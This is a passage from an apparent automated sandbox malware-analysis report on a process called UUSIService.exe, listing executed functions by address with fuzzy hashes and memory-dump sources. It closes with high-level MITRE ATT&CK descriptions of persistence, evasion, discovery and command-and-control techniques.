Opcode Fuzzy Hash: 32ad76c7da33f7c38721fa4d1de61c20fa37a45d736e4eee91f2ca674b3e9af0
Instruction Fuzzy Hash: C0F06271405384AEE7109E16D884BA2FFD8EB91734F18C45AED084B286D2799845CA72

Function 01320910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57eedbe065a6e225d549c0a216c2c1c272d2b32a0d8472c095e11d77975930e4
Instruction ID: ed8f24ce69a80371e0e200005e87527759b8a40140eb81cf2366aafe1a1ea8a2
Opcode Fuzzy Hash: 57eedbe065a6e225d549c0a216c2c1c272d2b32a0d8472c095e11d77975930e4
Instruction Fuzzy Hash: 00F08972A1015D97DF04DB64C955AEFBBB69F84300F054526D503B7350DE70690687D1

Function 01320838 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe747faa735c7de2241b1e1f3a2e4270c77391b74502bb607f798ae353e54d9
Instruction ID: 9221549854d6dff131b6bc013089bb509b61845bc83d35d817848ac2ede6b579
Opcode Fuzzy Hash: 9fe747faa735c7de2241b1e1f3a2e4270c77391b74502bb607f798ae353e54d9
Instruction Fuzzy Hash: 5BE0927294A388AFD702CBB8C81569C7FB0EB42140F5602DBE4C4C7552C6315919C741

Function 01321798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582aae0a5dcd13180b0d05e5a4e6cffa374ce0425d1f5bedac18e9bc3329cda2
Instruction ID: 8d4932de5ba3754417cf98176fb155ee3bed8bb911f887ad865ebfa842b90b55
Opcode Fuzzy Hash: 582aae0a5dcd13180b0d05e5a4e6cffa374ce0425d1f5bedac18e9bc3329cda2
Instruction Fuzzy Hash: 89D02E323003258BCF2DB2BCA90066B73DA9FC4769B00047EE20DCB340E9B2C80083C0

Function 01320848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ebe0c3af3752569bc42108cea6b3af3f56f6f6c7082eca439bf172492b35d7
Instruction ID: 157496beae47922f2c60fc020d29c7681b93bdb85f8cf1d2f50a8de282702d58
Opcode Fuzzy Hash: 60ebe0c3af3752569bc42108cea6b3af3f56f6f6c7082eca439bf172492b35d7
Instruction Fuzzy Hash: 52D01772945208EFEB01DFB8C84575D7BB9BB05280F650596E488C7251DA319E50D791

Function 01321788 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001C.00000002.3155012785.0000000001320000.00000040.00000800.00020000.00000000.sdmp, Offset: 01320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_1320000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47cb0de89ce6ff150f4ff8064feb4c156d9c37e0d03a706610086ccec2d9bc2b
Instruction ID: ece73d6143c9929027a6528f70a99c7da09369e0074c3e79afea4a8b04dfa02d
Opcode Fuzzy Hash: 47cb0de89ce6ff150f4ff8064feb4c156d9c37e0d03a706610086ccec2d9bc2b
Instruction Fuzzy Hash: 2ED0A73210D3A40EC71B21781F200563F6A4E4215430A00FFD044CA673E56589049791

Analysis Process: UUSIService.exePID: 6476, Parent PID: 4004COMMON

Executed Functions

Function 00D80DE8 Relevance: .4, Instructions: 374COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f40573872031f3766b2d0c4acfa6d07833bdc80fc78128426f2ec8ea378bfd5
Instruction ID: f5c23ab76075feb7f1de6e1899b59b4f8dbf895c770320d91de89aee2955d465
Opcode Fuzzy Hash: 2f40573872031f3766b2d0c4acfa6d07833bdc80fc78128426f2ec8ea378bfd5
Instruction Fuzzy Hash: 71F1E035A002488FDB05DFA8C484ADDBBF2FF49320F599195E845AB362DB31AD85CF60

Function 00D80DDA Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73bdb98feac6a5a04e908f1b38d3e740fe2cc29ec730fba325cc7a821d4c5bca
Instruction ID: da9a2245e70db561eadeee8e0234ef8e49ae3f0cfeb3b2eafd30b0e6c0735200
Opcode Fuzzy Hash: 73bdb98feac6a5a04e908f1b38d3e740fe2cc29ec730fba325cc7a821d4c5bca
Instruction Fuzzy Hash: 5FF1E275A002488FDB05DFA8C484ADDBBF2FF49320F199595E845AB362DB31AD85CF60

Function 00D81509 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b3e38381f6c1ee38877aa5e59bc3bf0c8af1357d1a8564992b1ffd25b608ba
Instruction ID: 9d49560ec53dacab2057ccd590c746949c9a7485bd4015e61fff95ffaf116739
Opcode Fuzzy Hash: 22b3e38381f6c1ee38877aa5e59bc3bf0c8af1357d1a8564992b1ffd25b608ba
Instruction Fuzzy Hash: 4EF02B312043406FC701677998116AA7BE2DFC275071445BEE40D8F345CE64BC0687E4

Function 00D80B28 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f05ad8d7cfd60fddb2d8c2883690a91b9a915e85f89f905e27de65fa4447e086
Instruction ID: 42990babc654153a75e80e839eb81adc45c33a89877c75a827e43cff5bc52a6c
Opcode Fuzzy Hash: f05ad8d7cfd60fddb2d8c2883690a91b9a915e85f89f905e27de65fa4447e086
Instruction Fuzzy Hash: 0B41A0B0A047458FDB25DF29D8406DEBBF2FF89740F14465AD496AB2A5D730AC48CB60

Function 00D80A60 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669bdabe24073ef5c9bfb17ecbd560aed21e3fcaad0041409c5c07dd526cad03
Instruction ID: 6734cba0e6843201f1fb92685ea79713e91473f8cac9a95e75046fa38b2a5eb5
Opcode Fuzzy Hash: 669bdabe24073ef5c9bfb17ecbd560aed21e3fcaad0041409c5c07dd526cad03
Instruction Fuzzy Hash: 6E211A343104108FD745AB29D859A2D7BE6FFCEA1076644A9E50ACB372DE72DC018B51

Function 00D80A70 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90a99dcad3ca684a23114977071b89e83218beb4921d10a519ae5c0bf4ddfda9
Instruction ID: 6ec5cf55d832c96854e1b73d0997cbae169a166e378a4ed342201ee3a612d58d
Opcode Fuzzy Hash: 90a99dcad3ca684a23114977071b89e83218beb4921d10a519ae5c0bf4ddfda9
Instruction Fuzzy Hash: 5A1107343104148FC744EB29D498A2E7BE6FFCDA1076544A9E50ACB376DE72EC018B91

Function 00D80E79 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48ccf9236f42c347080bfd73e496facb4f994096854a74aa13678b76b57c59ec
Instruction ID: 4734ed7a032eaf9ad676c8d00bf957e5c57238ffa34b271ced189c14b2ce9029
Opcode Fuzzy Hash: 48ccf9236f42c347080bfd73e496facb4f994096854a74aa13678b76b57c59ec
Instruction Fuzzy Hash: 99216C35A002489FDB05DFA8D8849DDBBF2FF89320F589095E905AB261DA21AD85CF60

Function 00D80CC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ede2b5d5e4c0da8f1718f25fcc3848e37446a6eafb51425554280d37be9690b
Instruction ID: 643c4721631587b85dcc5a8c2e923dc8a63ce2ab4f916020a50e50c9823b6dc7
Opcode Fuzzy Hash: 5ede2b5d5e4c0da8f1718f25fcc3848e37446a6eafb51425554280d37be9690b
Instruction Fuzzy Hash: 86118E32D0574AABCB01CFB9E8404DDFFB1AF99310F258766E111B7251E770258ACB60

Function 00D80989 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52042b1dd9ef38b4d37c74872fa00ac66c1469b11844a7bfea054bbc35f86aaf
Instruction ID: f6a04b206a18a4f789b04a211bd2eb7245fa9d0b509ce7d103c9138796a50d0e
Opcode Fuzzy Hash: 52042b1dd9ef38b4d37c74872fa00ac66c1469b11844a7bfea054bbc35f86aaf
Instruction Fuzzy Hash: 82114938900606CFCB05EF65E89498DBFB5FB84700B2046E9D411D726DEB70AD46CF80

Function 00D80879 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e2304062ae3d459a5657298b563b6157b9913dfc4213930635e52b43404389
Instruction ID: eef2e2dcfac551dec54efb93130cb39232fec2039d1c1a8a3b708aa58c913874
Opcode Fuzzy Hash: 82e2304062ae3d459a5657298b563b6157b9913dfc4213930635e52b43404389
Instruction Fuzzy Hash: 7B01B132D1464A9BCB019BB9CC004DDFBB2EFCA310F258693D211B71A0EB70254EC7A1

Function 00B2D1C5 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3226642140.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b2d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b599273fe5126ba2d71402ce3d9b6ff845e9de196e30104a5eceb018443a12e
Instruction ID: ef558190b51e8b61ae52be45dd2a227d1f419a29a6a7c1ed2f0171cacd57ac16
Opcode Fuzzy Hash: 1b599273fe5126ba2d71402ce3d9b6ff845e9de196e30104a5eceb018443a12e
Instruction Fuzzy Hash: F401A731404354DAE7214A55E9C4B67FBDCEF81725F18C49AED0D5A182C379D841C672

Function 00D80CD0 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a37e21ab7df3d51cb39da97b2af3d1a4da1210fc384c74c898c5899527b2ab
Instruction ID: 22346ec3ab5f40c57d9a0238a5cbb5eb4f76aef9846f9f294d98517cd9c544cd
Opcode Fuzzy Hash: a6a37e21ab7df3d51cb39da97b2af3d1a4da1210fc384c74c898c5899527b2ab
Instruction Fuzzy Hash: D2015E32D0060EABCB00DFBAD8404DDFBB5EF89320F218766E11177650EB70258ACB60

Function 00D80998 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b4051ef4df7353279458fb6045177e09230262055470aed3b8c1687944984ce
Instruction ID: 7dbfd8a41b88ecc3209cc3f59403d429e5129366572308952c666ed04926072f
Opcode Fuzzy Hash: 2b4051ef4df7353279458fb6045177e09230262055470aed3b8c1687944984ce
Instruction Fuzzy Hash: F0110638900606CFCB05FF65E89898DBBB9FB84700B2046E8D5119723CEB70AD46CF80

Function 00D80901 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 465176574f3761ba2d9b3b962f1523d6f4c821356788e36ee99b71f4c88b92a2
Instruction ID: bc808b0e608b5033d40e7f482525bbe93f377029b86224c6238d10feb618457e
Opcode Fuzzy Hash: 465176574f3761ba2d9b3b962f1523d6f4c821356788e36ee99b71f4c88b92a2
Instruction Fuzzy Hash: 8EF04C72A001499FDB04EB64CC55ADFBFB58F84300F18892AD002B7381DE70550A87D2

Function 00D80D51 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e9786f3cb8767e70b1dc7485e50c7d0d091002eccd2299bb7470695831c2de9
Instruction ID: 14f1eb48be8a22dcfba4cdc3d76cdbd8c14c1e185d37e019b98f48df70c2de2a
Opcode Fuzzy Hash: 5e9786f3cb8767e70b1dc7485e50c7d0d091002eccd2299bb7470695831c2de9
Instruction Fuzzy Hash: D4F0C232A012499FDF04EB64C865ADEBFB59F84310F158429D502B7380DE70690A87D1

Function 00B2D1C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3226642140.0000000000B2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_b2d000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6767459bde27d469a8800642b068d0a8593640c9bf77872cf33d259ded544d58
Instruction ID: 96fbcd59abf8301c9ac140440ca4c223a95bbe7e94a5aaa55a5edd1e6171fbca
Opcode Fuzzy Hash: 6767459bde27d469a8800642b068d0a8593640c9bf77872cf33d259ded544d58
Instruction Fuzzy Hash: FDF06271405354AAE7108E16E984B62FFE8EB91734F18C45AED4C5A286C3799844CA71

Function 00D80910 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0a827326e18881dae4f971584b8a430c2d1ee8b0d8c0e45011c5fb3a4fdc92
Instruction ID: e24d776b17a67f96bbff05d3ebe084cd80f1efe5f5bbf04e35b743f4bd98c25b
Opcode Fuzzy Hash: 7b0a827326e18881dae4f971584b8a430c2d1ee8b0d8c0e45011c5fb3a4fdc92
Instruction Fuzzy Hash: 19F08972A1014997DF04EB64C955AEFBFB69F84310F154525D512B7340DE70690A87D1

Function 00D80838 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e29e539c4504d6568b73b2f6be52a00469dc7a4c2ecb80b4aaf096509835455
Instruction ID: 9f8ecc7c61a9d39df9cf945a146351e5051af77ca88976f51d52f93f40bfc3f9
Opcode Fuzzy Hash: 2e29e539c4504d6568b73b2f6be52a00469dc7a4c2ecb80b4aaf096509835455
Instruction Fuzzy Hash: CFE092B190A7449FD702DBA488022883FB4BB12280F5A04C6D044CB253D6315E05C751

Function 00D81798 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a369e1d56615e8ece079682afd471b01df69112dfbbcafa4ecde3fcbee506b36
Instruction ID: 5382df1fe65535fb124da0ca74fc3c3a324659227570a6f9d820fd36be4c872c
Opcode Fuzzy Hash: a369e1d56615e8ece079682afd471b01df69112dfbbcafa4ecde3fcbee506b36
Instruction Fuzzy Hash: 65D02E323003148BCF28B2B8680156A33EDCFC4365B00447EE20DCB340E932CC8083E0

Function 00D8178A Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c4f5aecfee2df06c7a700c1de1aa1c346f01b3e958eeeeedf39b0ac8508531
Instruction ID: 114d93d9dac08a84f17cc9120486222a0dccf7a58f0670dd2369797cb15837fe
Opcode Fuzzy Hash: 92c4f5aecfee2df06c7a700c1de1aa1c346f01b3e958eeeeedf39b0ac8508531
Instruction Fuzzy Hash: 4FD05E76A4E3904EDB2622742C210A93FB44D6325430E42EFD444D66A3D055480A8361

Function 00D80848 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.3227163209.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d80000_UUSIService.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa4ebf45643d41a48b0b5ecdb892f230ded8127f8ca9e438734cd5a407184347
Instruction ID: 9795c01726f66094244408e093e58fbed43ad8cd4579f73f4cbaddb78bea66d6
Opcode Fuzzy Hash: fa4ebf45643d41a48b0b5ecdb892f230ded8127f8ca9e438734cd5a407184347
Instruction Fuzzy Hash: F6D017B2905208EFDB41DFA4C80575D7BB8BB05280F664496E448C7201DA319E50D791

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
